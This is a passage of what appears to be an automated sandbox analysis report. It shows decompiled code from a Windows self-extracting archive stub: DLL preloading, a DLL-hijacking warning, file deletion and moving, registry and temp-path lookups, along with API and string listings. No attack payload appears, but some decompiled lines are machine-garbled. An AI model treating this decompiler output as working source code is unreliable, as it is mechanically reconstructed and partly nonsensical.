					_a40 = L"usp10.dll";
					_a44 = L"clbcatq.dll";
					_a48 = L"comres.dll";
					_a52 = L"ws2_32.dll";
					_a56 = L"ws2help.dll";
					_a60 = L"psapi.dll";
					_a64 = L"ieframe.dll";
					_a68 = L"ntshrui.dll";
					_a72 = L"atl.dll";
					_a76 = L"setupapi.dll";
					_a80 = L"apphelp.dll";
					_a84 = L"userenv.dll";
					_a88 = L"netapi32.dll";
					_a92 = L"shdocvw.dll";
					_a96 = L"crypt32.dll";
					_a100 = L"msasn1.dll";
					_a104 = L"cryptui.dll";
					_a108 = L"wintrust.dll";
					_a112 = L"shell32.dll";
					_a116 = L"secur32.dll";
					_a120 = L"cabinet.dll";
					_a124 = L"oleaccrc.dll";
					_a128 = L"ntmarta.dll";
					_a132 = L"profapi.dll";
					_a136 = L"WindowsCodecs.dll";
					_a140 = L"srvcli.dll";
					_a144 = L"cscapi.dll";
					_a148 = L"slc.dll";
					_a152 = L"imageres.dll";
					_a156 = L"dnsapi.DLL";
					_a160 = L"iphlpapi.DLL";
					_a164 = L"WINNSI.DLL";
					_a168 = L"netutils.dll";
					_a172 = L"mpr.dll";
					_a176 = L"devrtl.dll";
					_a180 = L"propsys.dll";
					_a184 = L"mlang.dll";
					_a188 = L"samcli.dll";
					_a192 = L"samlib.dll";
					_a196 = L"wkscli.dll";
					_a200 = L"dfscli.dll";
					_a204 = L"browcli.dll";
					_a208 = L"rasadhlp.dll";
					_a212 = L"dhcpcsvc6.dll";
					_a216 = L"dhcpcsvc.dll";
					_a220 = L"XmlLite.dll";
					_a224 = L"linkinfo.dll";
					_a228 = L"cryptsp.dll";
					_a232 = L"RpcRtRemote.dll";
					_a236 = L"aclui.dll";
					_a240 = L"dsrole.dll";
					_a244 = L"peerdist.dll";
					if( *_t115 == 0x78) {
						L14:
						GetModuleFileNameW(0,  &_a768, _t201);
						E0100FE56( &_a9156, E0100BC85(_t223,  &_a768), _t201);
						_t194 = 0;
						_t202 = 0;
						do {
							if(E0100ACF5() < 0x600) {
								_t123 = 0;
								__eflags = 0;
							} else {
								_t123 = E01010085( *((intOrPtr*)(_t210 + 0x14 + _t202 * 4))); // executed
							}
							if(_t123 == 0) {
								L20:
								_push(0x800);
								E0100BCFB(_t227,  &_a768,  *((intOrPtr*)(_t210 + 0x18 + _t202 * 4)));
								_t127 = GetFileAttributesW( &_a756); // executed
								if(_t127 != _t208) {
									_t194 =  *((intOrPtr*)(_t210 + 0x14 + _t202 * 4));
									L24:
									if(_t180 != 0) {
										L30:
										_t234 = _t194;
										if(_t194 == 0) {
											return _t127;
										}
										E0100BCCF(_t234,  &_a764);
										if(E0100ACF5() < 0x600) {
											_push( &_a9156);
											_push( &_a764);
											E0100400A( &_a4860, 0x864, L"Please remove %s from %s folder. It is unsecure to run %s until it is done.", _t194);
											_t210 = _t210 + 0x18;
											_t127 = AllocConsole();
											__eflags = _t127;
											if(_t127 != 0) {
												__imp__AttachConsole(GetCurrentProcessId());
												_t138 = E010235B3( &_a4856);
												WriteConsoleW(GetStdHandle(0xfffffff4),  &_a4856, _t138,  &_v8, 0);
												Sleep(0x2710);
												_t127 = FreeConsole();
											}
										} else {
											E01010085(L"dwmapi.dll");
											E01010085(L"uxtheme.dll");
											_push( &_a9148);
											_push( &_a756);
											E0100400A( &_a4848, 0x864, E0100DDD1(_t182, 0xf1), _t194);
											_t210 = _t210 + 0x18;
											_t127 = E01019F35(0,  &_a4844, E0100DDD1(_t182, 0xf0), 0x30);
										}
										ExitProcess(0);
									}
									_t204 = 0;
									while(1) {
										_push(0x800);
										E0100BCFB(0,  &_a764,  *((intOrPtr*)(_t210 + 0x38 + _t204 * 4)));
										_t127 = GetFileAttributesW( &_a752);
										if(_t127 != _t208) {
											break;
										}
										_t204 = _t204 + 1;
										if(_t204 < 0x35) {
											continue;
										}
										goto L30;
									}
									_t194 =  *((intOrPtr*)(_t210 + 0x34 + _t204 * 4));
									goto L30;
								}
							} else {
								_t127 = CompareStringW(0x400, 0x1001,  *(_t210 + 0x20 + _t202 * 4), _t208, L"DXGIDebug.dll", _t208); // executed
								_t227 = _t127 - 2;
								if(_t127 != 2) {
									goto L21;
								}
								goto L20;
							}
							L21:
							_t202 = _t202 + 1;
						} while (_t202 < 8);
						goto L24;
					}
					_t196 = E010270DD(_t182, _t115);
					_pop(_t182);
					if(_t196 == 0) {
						goto L14;
					}
					GetModuleFileNameW(0,  &_a4864, 0x800);
					_t205 = CreateFileW( &_a4864, 0x80000000, 1, 0, 3, 0, 0);
					if(_t205 == _t208 || SetFilePointer(_t205, _t196, 0, 0) != _t196) {
						L13:
						CloseHandle(_t205);
						_t201 = 0x800;
						goto L14;
					} else {
						_t164 = ReadFile(_t205,  &_a13256, 0x7ffe,  &_v0, 0);
						_t222 = _t164;
						if(_t164 == 0) {
							goto L13;
						}
						_t182 = 0;
						_push(0x104);
						 *((short*)(_t210 + 0x33dc + (_v0 >> 1) * 2)) = 0;
						_push( &_a248);
						_push( &_a13256);
						while(1) {
							_t197 = E0100FBD8(_t222);
							_t223 = _t197;
							if(_t197 == 0) {
								goto L13;
							}
							E01010085( &_a248);
							_push(0x104);
							_push( &_a244);
							_push(_t197);
						}
						goto L13;
					}
				}
				_t173 = GetProcAddress(_t200, "SetDllDirectoryW");
				_t180 = _a46028;
				_t198 = _t173;
				if(_t198 != 0) {
					asm("sbb ecx, ecx");
					_t182 = _t198;
					 *0x1033260( ~(_t180 & 0x000000ff) & 0x010335b4);
					 *_t198();
				}
				_t206 = GetProcAddress(_t200, "SetDefaultDllDirectories");
				if(_t206 != 0) {
					_t182 = _t206;
					 *0x1033260(((0 | _t180 == 0x00000000) - 0x00000001 & 0xfffff800) + 0x1000);
					 *_t206();
					_t180 = 1;
				}
				goto L5;
			}

0x010100d4
0x010100da
0x010100e2
0x010100ea
0x010100ee
0x01010154
0x01010154
0x01010159
0x0101015c
0x01010164
0x01010169
0x01010171
0x0101017c
0x01010184
0x0101018c
0x01010194
0x0101019c
0x010101a4
0x010101ac
0x010101b4
0x010101bc
0x010101c4
0x010101cc
0x010101d4
0x010101dc
0x010101e4
0x010101ec
0x010101f4
0x010101fc
0x01010204
0x0101020c
0x01010214
0x0101021c
0x01010224
0x0101022c
0x01010234
0x0101023c
0x01010247
0x01010252
0x0101025d
0x01010268
0x01010273
0x0101027e
0x01010289
0x01010294
0x0101029f
0x010102aa
0x010102b5
0x010102c0
0x010102cb
0x010102d6
0x010102e1
0x010102ec
0x010102f7
0x01010302
0x0101030d
0x01010318
0x01010323
0x0101032e
0x01010339
0x01010344
0x0101034f
0x0101035a
0x01010365
0x01010370
0x0101037b
0x01010386
0x01010391
0x0101039c
0x010103a7
0x010103b2
0x01010484
0x0101048f
0x010104ac
0x010104b1
0x010104b3
0x010104b5
0x010104bf
0x010104cc
0x010104cc
0x010104c1
0x010104c5
0x010104c5
0x010104d0
0x010104f2
0x010104f2
0x01010503
0x01010510
0x01010518
0x01010522
0x01010526
0x01010528
0x01010560
0x01010560
0x01010562
0x01010679
0x01010679
0x01010570
0x0101057f
0x010105ee
0x010105f6
0x0101060a
0x0101060f
0x01010612
0x01010618
0x0101061a
0x01010623
0x01010638
0x01010650
0x0101065b
0x01010661
0x01010661
0x01010581
0x01010586
0x01010590
0x0101059c
0x010105a4
0x010105be
0x010105c3
0x010105dd
0x010105dd
0x01010669
0x01010669
0x0101052a
0x0101052c
0x0101052c
0x0101053d
0x0101054a
0x01010552
0x00000000
0x00000000
0x01010554
0x01010558
0x00000000
0x00000000
0x00000000
0x0101055a
0x0101055c
0x00000000
0x0101055c
0x010104d2
0x010104e7
0x010104ed
0x010104f0
0x00000000
0x00000000
0x00000000
0x010104f0
0x0101051a
0x0101051a
0x0101051b
0x00000000
0x01010520
0x010103be
0x010103c0
0x010103c3
0x00000000
0x00000000
0x010103d4
0x010103f6
0x010103fa
0x01010478
0x01010479
0x0101047f
0x00000000
0x0101040c
0x01010421
0x01010427
0x01010429
0x00000000
0x00000000
0x01010431
0x01010433
0x01010438
0x01010447
0x0101044f
0x0101046d
0x01010472
0x01010474
0x01010476
0x00000000
0x00000000
0x0101045a
0x0101045f
0x0101046b
0x0101046c
0x0101046c
0x00000000
0x0101046d
0x010103fa
0x010100f6
0x010100fc
0x01010103
0x01010107
0x0101010e
0x01010117
0x01010119
0x0101011f
0x0101011f
0x0101012d
0x01010131
0x01010148
0x0101014a
0x01010150
0x01010152
0x01010152
0x00000000

APIs

GetModuleHandleW.KERNEL32(kernel32), ref: 010100E4
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 010100F6
GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 01010127
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 010103D4
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 010103F0
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 01010402
ReadFile.KERNEL32(00000000,?,00007FFE,01033BA4,00000000), ref: 01010421
CloseHandle.KERNEL32(00000000), ref: 01010479
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0101048F
CompareStringW.KERNELBASE(00000400,00001001,?,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 010104E7
GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00000000,?,00000800), ref: 01010510
GetFileAttributesW.KERNEL32(?,?,?,00000800), ref: 0101054A

Part of subcall function 01010085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 010100A0
Part of subcall function 01010085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0100EB86,Crypt32.dll,00000000,0100EC0A,?,?,0100EBEC,?,?,?), ref: 010100C2

_swprintf.LIBCMT ref: 010105BE
_swprintf.LIBCMT ref: 0101060A

Part of subcall function 0100400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0100401D

AllocConsole.KERNEL32 ref: 01010612
GetCurrentProcessId.KERNEL32 ref: 0101061C
AttachConsole.KERNEL32(00000000), ref: 01010623
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 01010649
WriteConsoleW.KERNEL32(00000000), ref: 01010650
Sleep.KERNEL32(00002710), ref: 0101065B
FreeConsole.KERNEL32 ref: 01010661
ExitProcess.KERNEL32 ref: 01010669

Strings

SetDefaultDllDirectories, xrefs: 01010121
Please remove %s from %s folder. It is unsecure to run %s until it is done., xrefs: 010105F8
kernel32, xrefs: 010100DD
SetDllDirectoryW, xrefs: 010100F0
uxtheme.dll, xrefs: 0101058B
DXGIDebug.dll, xrefs: 01010169, 010104D3
dwmapi.dll, xrefs: 01010194, 01010581

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
API String ID: 1201351596-3298887752
Opcode ID: 2315db1313685bfc049cebc6b261245d5f2343c040dc4182c14408e22e5caedc
Instruction ID: c0de6268c2b102fc23562b2324aa056da278a58d527608ac7acb1c127e7c80d4
Opcode Fuzzy Hash: 2315db1313685bfc049cebc6b261245d5f2343c040dc4182c14408e22e5caedc
Instruction Fuzzy Hash: 51D17EB1148385ABD335AF51D888BDFFAECBBC5704F40491DF6C99E284DB3985488B62

Uniqueness

Uniqueness Score: -1.00%

Function 0101BDF5, Relevance: 31.9, APIs: 14, Strings: 4, Instructions: 429
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 45%

			E0101BDF5(void* __edx) {
				intOrPtr _t226;
				void* _t231;
				intOrPtr _t287;
				void* _t300;
				signed int _t302;
				void* _t306;
				signed int _t307;
				void* _t311;

				_t300 = __edx;
				E0101E28C(E01032053, _t311);
				_t226 = 0x1bd4c;
				E0101E360();
				if( *((intOrPtr*)(_t311 + 0xc)) == 0) {
					L177:
					 *[fs:0x0] =  *((intOrPtr*)(_t311 - 0xc));
					return _t226;
				}
				_push(0x1000);
				_push(_t311 - 0x15);
				_push(_t311 - 0xd);
				_push(_t311 - 0x3508);
				_push(_t311 - 0xfd58);
				_push( *((intOrPtr*)(_t311 + 0xc)));
				_t226 = E0101AA36();
				 *((intOrPtr*)(_t311 + 0xc)) = 0x1bd4c;
				if(0x1bd4c != 0) {
					_t287 =  *((intOrPtr*)(_t311 + 0x10));
					do {
						_t231 = _t311 - 0x3508;
						_t306 = _t311 - 0x1bd58;
						_t302 = 6;
						goto L4;
						L6:
						while(E010117AC(_t311 - 0xfd58,  *((intOrPtr*)(0x103e618 + _t307 * 4))) != 0) {
							_t307 = _t307 + 1;
							if(_t307 < 0xe) {
								continue;
							} else {
								goto L175;
							}
						}
						if(_t307 > 0xd) {
							goto L175;
						}
						switch( *((intOrPtr*)(_t307 * 4 +  &M0101CAA1))) {
							case 0:
								__eflags = _t287 - 2;
								if(_t287 == 2) {
									E01019DA4(_t311 - 0x7d50, 0x800);
									E0100A49D(E0100B965(_t311 - 0x7d50, _t311 - 0x3508, _t311 - 0xdd58, 0x800), _t287, _t311 - 0x8d58, _t307);
									 *(_t311 - 4) = 0;
									E0100A5D7(_t311 - 0x8d58, _t311 - 0xdd58);
									E010070BF(_t311 - 0x5d50);
									while(1) {
										_push(0);
										_t295 = _t311 - 0x8d58;
										_t249 = E0100A52A(_t311 - 0x8d58, _t300, _t311 - 0x5d50);
										__eflags = _t249;
										if(_t249 == 0) {
											break;
										}
										SetFileAttributesW(_t311 - 0x5d50, 0);
										__eflags =  *(_t311 - 0x4d44);
										if(__eflags == 0) {
											L18:
											_t253 = GetFileAttributesW(_t311 - 0x5d50);
											__eflags = _t253 - 0xffffffff;
											if(_t253 == 0xffffffff) {
												continue;
											}
											_t255 = DeleteFileW(_t311 - 0x5d50);
											__eflags = _t255;
											if(_t255 != 0) {
												continue;
											} else {
												_t309 = 0;
												_push(0);
												goto L22;
												L22:
												E0100400A(_t311 - 0x1108, 0x800, L"%s.%d.tmp", _t311 - 0x5d50);
												_t313 = _t313 + 0x14;
												_t260 = GetFileAttributesW(_t311 - 0x1108);
												__eflags = _t260 - 0xffffffff;
												if(_t260 != 0xffffffff) {
													_t309 = _t309 + 1;
													__eflags = _t309;
													_push(_t309);
													goto L22;
												} else {
													_t263 = MoveFileW(_t311 - 0x5d50, _t311 - 0x1108);
													__eflags = _t263;
													if(_t263 != 0) {
														MoveFileExW(_t311 - 0x1108, 0, 4);
													}
													continue;
												}
											}
										}
										E0100B4F7(_t295, __eflags, _t311 - 0x7d50, _t311 - 0x1108, 0x800);
										E0100B207(__eflags, _t311 - 0x1108, 0x800);
										_t310 = E010235B3(_t311 - 0x7d50);
										__eflags = _t310 - 4;
										if(_t310 < 4) {
											L16:
											_t274 = E0100B925(_t311 - 0x3508);
											__eflags = _t274;
											if(_t274 != 0) {
												break;
											}
											L17:
											_t277 = E010235B3(_t311 - 0x5d50);
											__eflags = 0;
											 *((short*)(_t311 + _t277 * 2 - 0x5d4e)) = 0;
											E0101F350(0x800, _t311 - 0x40, 0, 0x1e);
											_t313 = _t313 + 0x10;
											 *((intOrPtr*)(_t311 - 0x3c)) = 3;
											_push(0x14);
											_pop(_t280);
											 *((short*)(_t311 - 0x30)) = _t280;
											 *((intOrPtr*)(_t311 - 0x38)) = _t311 - 0x5d50;
											_push(_t311 - 0x40);
											 *0x1062074();
											goto L18;
										}
										_t285 = E010235B3(_t311 - 0x1108);
										__eflags = _t310 - _t285;
										if(_t310 > _t285) {
											goto L17;
										}
										goto L16;
									}
									 *(_t311 - 4) =  *(_t311 - 4) | 0xffffffff;
									E0100A4B3(_t311 - 0x8d58);
								}
								goto L175;
							case 1:
								__eflags = __ebx;
								if(__ebx == 0) {
									__eax =  *0x105dc84; // 0x0
									__eflags = __eax;
									__ebx = __ebx & 0xffffff00 | __eax == 0x00000000;
									__eflags = __bl;
									if(__bl == 0) {
										__eax =  *0x105dc84; // 0x0
										_pop(__ecx);
										_pop(__ecx);
									}
									__bh =  *((intOrPtr*)(__ebp - 0xd));
									__eflags = __bh;
									if(__eflags == 0) {
										__eax = __ebp + 0xc;
										_push(__ebp + 0xc);
										__esi = E0101AB9A(__ecx, __edx, __eflags);
										__eax =  *0x105dc84; // 0x0
									} else {
										__esi = __ebp - 0x3508;
									}
									__eflags = __bl;
									if(__bl == 0) {
										__edi = __eax;
									}
									__eax = E010235B3(__esi);
									__eax = __eax + __edi;
									_push(__eax);
									_push( *0x105dc84);
									__eax = E010235DE(__ecx, __edx);
									__esp = __esp + 0xc;
									__eflags = __eax;
									if(__eax != 0) {
										 *0x105dc84 = __eax;
										__eflags = __bl;
										if(__bl != 0) {
											__ecx = 0;
											__eflags = 0;
											 *__eax = __cx;
										}
										__eax = E01027168(__eax, __esi);
										_pop(__ecx);
										_pop(__ecx);
									}
									__eflags = __bh;
									if(__bh == 0) {
										__eax = L010235CE(__esi);
									}
								}
								goto L175;
							case 2:
								__eflags = __ebx;
								if(__ebx == 0) {
									__ebp - 0x3508 = SetWindowTextW( *(__ebp + 8), __ebp - 0x3508);
								}
								goto L175;
							case 3:
								__eflags = __ebx;
								if(__ebx != 0) {
									goto L175;
								}
								__eflags =  *0x104a472 - __di;
								if( *0x104a472 != __di) {
									goto L175;
								}
								__eax = 0;
								__edi = __ebp - 0x3508;
								_push(0x22);
								 *(__ebp - 0x1108) = __ax;
								_pop(__eax);
								__eflags =  *(__ebp - 0x3508) - __ax;
								if( *(__ebp - 0x3508) == __ax) {
									__edi = __ebp - 0x3506;
								}
								__eax = E010235B3(__edi);
								__esi = 0x800;
								__eflags = __eax - 0x800;
								if(__eax >= 0x800) {
									goto L175;
								} else {
									__eax =  *__edi & 0x0000ffff;
									_push(0x5c);
									_pop(__ecx);
									__eflags = ( *__edi & 0x0000ffff) - 0x2e;
									if(( *__edi & 0x0000ffff) != 0x2e) {
										L52:
										__eflags = __ax - __cx;
										if(__ax == __cx) {
											L64:
											__ebp - 0x1108 = E0100FE56(__ebp - 0x1108, __edi, __esi);
											__ebx = 0;
											__eflags = 0;
											L65:
											_push(0x22);
											_pop(__eax);
											__eax = __ebp - 0x1108;
											__eax = E010217CB(__ebp - 0x1108, __ebp - 0x1108);
											_pop(__ecx);
											_pop(__ecx);
											__eflags = __eax;
											if(__eax != 0) {
												__eflags =  *(__eax + 2) - __bx;
												if( *(__eax + 2) == __bx) {
													__ecx = 0;
													__eflags = 0;
													 *__eax = __cx;
												}
											}
											__eax = __ebp - 0x1108;
											__edi = 0x104a472;
											E0100FE56(0x104a472, __ebp - 0x1108, __esi) = __ebp - 0x1108;
											__eax = E0101A8D0(__ebp - 0x1108, __esi);
											__esi = GetDlgItem( *(__ebp + 8), 0x66);
											__ebp - 0x1108 = SetWindowTextW(__esi, __ebp - 0x1108); // executed
											__eax = SendMessageW(__esi, 0x143, __ebx, 0x104a472); // executed
											__eax = __ebp - 0x1108;
											__eax = E010235E9(__ebp - 0x1108, 0x104a472, __eax);
											_pop(__ecx);
											_pop(__ecx);
											__eflags = __eax;
											if(__eax != 0) {
												__ebp - 0x1108 = SendMessageW(__esi, 0x143, __ebx, __ebp - 0x1108);
											}
											goto L175;
										}
										__eflags = __ax;
										if(__ax == 0) {
											L55:
											__eax = __ebp - 0x1c;
											__ebx = 0;
											_push(__ebp - 0x1c);
											_push(1);
											_push(0);
											_push(L"Software\\Microsoft\\Windows\\CurrentVersion");
											_push(0x80000002);
											__eax =  *0x1062028();
											__eflags = __eax;
											if(__eax == 0) {
												__eax = __ebp - 0x14;
												 *(__ebp - 0x14) = 0x1000;
												_push(__ebp - 0x14);
												__eax = __ebp - 0x1108;
												_push(__ebp - 0x1108);
												__eax = __ebp - 0x20;
												_push(__ebp - 0x20);
												_push(0);
												_push(L"ProgramFilesDir");
												_push( *(__ebp - 0x1c));
												__eax =  *0x1062024();
												_push( *(__ebp - 0x1c));
												 *0x1062004() =  *(__ebp - 0x14);
												__ecx = 0x7ff;
												__eax =  *(__ebp - 0x14) >> 1;
												__eflags = __eax - 0x7ff;
												if(__eax >= 0x7ff) {
													__eax = 0x7ff;
												}
												__ecx = 0;
												__eflags = 0;
												 *(__ebp + __eax * 2 - 0x1108) = __cx;
											}
											__eflags =  *(__ebp - 0x1108) - __bx;
											if( *(__ebp - 0x1108) != __bx) {
												__eax = __ebp - 0x1108;
												__eax = E010235B3(__ebp - 0x1108);
												_push(0x5c);
												_pop(__ecx);
												__eflags =  *((intOrPtr*)(__ebp + __eax * 2 - 0x110a)) - __cx;
												if(__eflags != 0) {
													__ebp - 0x1108 = E0100FE2E(__eflags, __ebp - 0x1108, "\\", __esi);
												}
											}
											__esi = E010235B3(__edi);
											__eax = __ebp - 0x1108;
											__eflags = __esi - 0x7ff;
											__esi = 0x800;
											if(__eflags < 0) {
												__ebp - 0x1108 = E0100FE2E(__eflags, __ebp - 0x1108, __edi, 0x800);
											}
											goto L65;
										}
										__eflags =  *((short*)(__edi + 2)) - 0x3a;
										if( *((short*)(__edi + 2)) == 0x3a) {
											goto L64;
										}
										goto L55;
									}
									__eflags =  *((intOrPtr*)(__edi + 2)) - __cx;
									if( *((intOrPtr*)(__edi + 2)) != __cx) {
										goto L52;
									}
									__edi = __edi + 4;
									__ebx = 0;
									__eflags =  *__edi - __bx;
									if( *__edi == __bx) {
										goto L175;
									}
									__ebp - 0x1108 = E0100FE56(__ebp - 0x1108, __edi, 0x800);
									goto L65;
								}
							case 4:
								__eflags =  *0x104a46c - 1;
								__eflags = __eax - 0x104a46c;
								 *__edi =  *__edi + __ecx;
								__eflags =  *__edi & __cl;
								_pop(es);
								 *__eax =  *__eax + __al;
								__eflags =  *__eax;
							case 5:
								__eax =  *(__ebp - 0x3508) & 0x0000ffff;
								__ecx = 0;
								__eax =  *(__ebp - 0x3508) & 0x0000ffff;
								__eflags = __eax;
								if(__eax == 0) {
									L82:
									 *0x1048453 = __cl;
									 *0x1048460 = 1;
									goto L175;
								}
								__eax = __eax - 0x30;
								__eflags = __eax;
								if(__eax == 0) {
									 *0x1048453 = __cl;
									L81:
									 *0x1048460 = __cl;
									goto L175;
								}
								__eax = __eax - 1;
								__eflags = __eax;
								if(__eax == 0) {
									goto L82;
								}
								__eax = __eax - 1;
								__eflags = __eax;
								if(__eax != 0) {
									goto L175;
								}
								 *0x1048453 = 1;
								goto L81;
							case 6:
								__edi = 0;
								 *0x105ec98 = 1;
								__edi = 1;
								__ebx = __ebp - 0x3508;
								__eflags =  *(__ebp - 0x3508) - 0x3c;
								if( *(__ebp - 0x3508) != 0x3c) {
									L99:
									__eflags =  *((intOrPtr*)(__ebp + 0x10)) - 5;
									if( *((intOrPtr*)(__ebp + 0x10)) != 5) {
										L102:
										__eflags =  *((intOrPtr*)(__ebp + 0x10)) - 4;
										if( *((intOrPtr*)(__ebp + 0x10)) == 4) {
											__eflags = __esi - 6;
											if(__esi == 6) {
												__eax = 0;
												_push(0);
												_push(__edi);
												_push(__ebx);
												_push( *(__ebp + 8));
												__eax = E0101CE22(__ebp);
											}
										}
										goto L175;
									}
									__eflags = __esi - 9;
									if(__esi != 9) {
										goto L175;
									}
									_push(1);
									_push(__edi);
									_push(__ebx);
									_push( *(__ebp + 8));
									__eax = E0101CE22(__ebp);
									goto L102;
								}
								__eax = __ebp - 0x3506;
								_push(0x3e);
								_push(__ebp - 0x3506);
								__eax = E010215E8(__ecx);
								_pop(__ecx);
								_pop(__ecx);
								__eflags = __eax;
								if(__eax == 0) {
									goto L99;
								}
								_t109 = __eax + 2; // 0x2
								__ecx = _t109;
								 *(__ebp - 0x14) = _t109;
								__ecx = 0;
								__eflags = 0;
								 *__eax = __cx;
								__eax = __ebp - 0x108;
								_push(0x64);
								_push(__ebp - 0x108);
								__eax = __ebp - 0x3506;
								_push(__ebp - 0x3506);
								while(1) {
									__ebx = E0101A6C7();
									__eflags = __ebx;
									if(__ebx == 0) {
										break;
									}
									__eflags =  *(__ebp - 0x108);
									if( *(__ebp - 0x108) == 0) {
										break;
									}
									__eax = __ebp - 0x108;
									__eax = E010117AC(__ebp - 0x108, L"HIDE");
									__eax =  ~__eax;
									asm("sbb eax, eax");
									__edi = __edi & __eax;
									__eax = __ebp - 0x108;
									__eax = E010117AC(__ebp - 0x108, L"MAX");
									__eflags = __eax;
									if(__eax == 0) {
										_push(3);
										_pop(__edi);
									}
									__eax = __ebp - 0x108;
									__eax = E010117AC(__ebp - 0x108, L"MIN");
									__eflags = __eax;
									if(__eax == 0) {
										_push(6);
										_pop(__edi);
									}
									_push(0x64);
									__eax = __ebp - 0x108;
									_push(__ebp - 0x108);
									_push(__ebx);
								}
								__ebx =  *(__ebp - 0x14);
								goto L99;
							case 7:
								__eflags = __ebx - 1;
								if(__eflags != 0) {
									L125:
									__eflags = __ebx - 7;
									if(__ebx == 7) {
										__eflags =  *0x104a46c;
										if( *0x104a46c == 0) {
											 *0x104a46c = 2;
										}
										 *0x1049468 = 1;
									}
									goto L175;
								}
								__eax = __ebp - 0x7d50;
								__edi = 0x800;
								GetTempPathW(0x800, __ebp - 0x7d50) = __ebp - 0x7d50;
								E0100B207(__eflags, __ebp - 0x7d50, 0x800) = 0;
								__esi = 0;
								_push(0);
								while(1) {
									_push( *0x103e5f8);
									__ebp - 0x7d50 = E0100400A(0x104946a, __edi, L"%s%s%u", __ebp - 0x7d50);
									__eax = E0100A180(0x104946a);
									__eflags = __al;
									if(__al == 0) {
										break;
									}
									__esi =  &(__esi->i);
									__eflags = __esi;
									_push(__esi);
								}
								__eax = SetDlgItemTextW( *(__ebp + 8), 0x66, 0x104946a);
								__eflags =  *(__ebp - 0x3508);
								if( *(__ebp - 0x3508) == 0) {
									goto L175;
								}
								__eflags =  *0x1056b7a;
								if( *0x1056b7a != 0) {
									goto L175;
								}
								__eax = 0;
								 *(__ebp - 0x1508) = __ax;
								__eax = __ebp - 0x3508;
								_push(0x2c);
								_push(__ebp - 0x3508);
								__eax = E010215E8(__ecx);
								_pop(__ecx);
								_pop(__ecx);
								__eflags = __eax;
								if(__eax != 0) {
									L121:
									__eflags =  *(__ebp - 0x1508);
									if( *(__ebp - 0x1508) == 0) {
										__ebp - 0x1bd58 = __ebp - 0x3508;
										E0100FE56(__ebp - 0x3508, __ebp - 0x1bd58, 0x1000) = __ebp - 0x19d58;
										__ebp - 0x1508 = E0100FE56(__ebp - 0x1508, __ebp - 0x19d58, 0x200);
									}
									__ebp - 0x3508 = E0101A4F2(__ebp - 0x3508);
									__eax = 0;
									 *(__ebp - 0x2508) = __ax;
									__ebp - 0x1508 = __ebp - 0x3508;
									__eax = E01019F35( *(__ebp + 8), __ebp - 0x3508, __ebp - 0x1508, 0x24);
									__eflags = __eax - 6;
									if(__eax == 6) {
										goto L175;
									} else {
										__eax = 0;
										__eflags = 0;
										 *0x1048450 = 1;
										 *0x104946a = __ax;
										__eax = EndDialog( *(__ebp + 8), 1);
										goto L125;
									}
								}
								__edx = 0;
								__esi = 0;
								__eflags =  *(__ebp - 0x3508) - __dx;
								if( *(__ebp - 0x3508) == __dx) {
									goto L121;
								}
								__ecx = 0;
								__eax = __ebp - 0x3508;
								while(1) {
									__eflags =  *__eax - 0x40;
									if( *__eax == 0x40) {
										break;
									}
									__esi =  &(__esi->i);
									__eax = __ebp - 0x3508;
									__ecx = __esi + __esi;
									__eax = __ebp - 0x3508 + __ecx;
									__eflags =  *__eax - __dx;
									if( *__eax != __dx) {
										continue;
									}
									goto L121;
								}
								__ebp - 0x3506 = __ebp - 0x3506 + __ecx;
								__ebp - 0x1508 = E0100FE56(__ebp - 0x1508, __ebp - 0x3506 + __ecx, 0x200);
								__eax = 0;
								__eflags = 0;
								 *(__ebp + __esi * 2 - 0x3508) = __ax;
								goto L121;
							case 8:
								__eflags = __ebx - 3;
								if(__ebx == 3) {
									__eflags =  *(__ebp - 0x3508) - __di;
									if(__eflags != 0) {
										__eax = __ebp - 0x3508;
										_push(__ebp - 0x3508);
										__eax = E01027107(__ebx, __edi);
										_pop(__ecx);
										 *0x105ec94 = __eax;
									}
									__eax = __ebp + 0xc;
									_push(__ebp + 0xc);
									 *0x105ec90 = E0101AB9A(__ecx, __edx, __eflags);
								}
								 *0x1056b7b = 1;
								goto L175;
							case 9:
								__eflags = __ebx - 6;
								if(__ebx != 6) {
									goto L175;
								}
								__eax = 0;
								 *(__ebp - 0x4d08) = __ax;
								__eax =  *(__ebp - 0x1bd58) & 0x0000ffff;
								__eax = E01026420( *(__ebp - 0x1bd58) & 0x0000ffff);
								_push(0x800);
								__eflags = __eax - 0x50;
								if(__eax == 0x50) {
									_push(0x105bb82);
									__eax = __ebp - 0x4d08;
									_push(__ebp - 0x4d08);
